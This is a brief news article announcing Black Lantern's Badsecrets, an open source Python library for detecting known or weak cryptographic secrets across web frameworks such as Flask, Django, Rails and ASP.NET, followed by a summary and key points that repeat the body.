This week, cybersecurity company Black Lantern announced Badsecrets, an open source tool designed to help identify known or weak cryptographic secrets across various web frameworks. The library is written in Python and has a modular design, offering ten modules meant to replace existing tools for finding secrets. Badsecrets is inspired by Blacklist3r, a project from NotSoSecure for locating secret keys related to publicly available web frameworks.
The goal of Badsecrets is to expand on the supported platforms and remove language and operating system dependencies. Currently, the modules support scanning for Flask cookie signing passwords, bad/weak signing passwords in Peoplesoft PS_TOKEN, ASP.NET machine keys, and secret keys in Telerik UI, Django’s session cookies, Ruby on Rails signed or encrypted session cookies, JSON Web Token, Mojarra and Myfaces implementations of Java Server Faces (JSF), and Symfony ‘_fragment’ URLs.
Black Lantern notes that Badsecrets is designed to identify known secrets that could be exploited for remote code execution (RCE) or privilege escalation, but does not help address these issues. However, the firm notes that exploitation of the identified misconfigurations can sometimes be straightforward, and in other cases might require more work or chaining with other vulnerabilities.
The cybersecurity firm hopes that Badsecrets will become the standard for identifying such vulnerabilities and encourages the community to grow the available modules to cover additional web frameworks and utilities.
In conclusion, Black Lantern’s Badsecrets is an open source tool designed to help identify known or weak cryptographic secrets across various web frameworks. The library has a modular design and is offering ten modules meant to replace existing tools for finding secrets. Badsecrets is not meant to address the identified vulnerabilities, but instead can help identify them in order to allow the developer to address the issue. The cybersecurity firm encourages the community to contribute to the library in order to expand its available modules to cover more web frameworks and utilities.
Key Points:
- Black Lantern’s Badsecrets is an open source tool designed to help identify known or weak cryptographic secrets
- The library has a modular design and is offering ten modules meant to replace existing tools for finding secrets
- Badsecrets is not meant to address the identified vulnerabilities, but instead can help identify them in order to allow the developer to address the issue
- The cybersecurity firm encourages the community to contribute to the library in order to expand its available modules to cover more web frameworks and utilities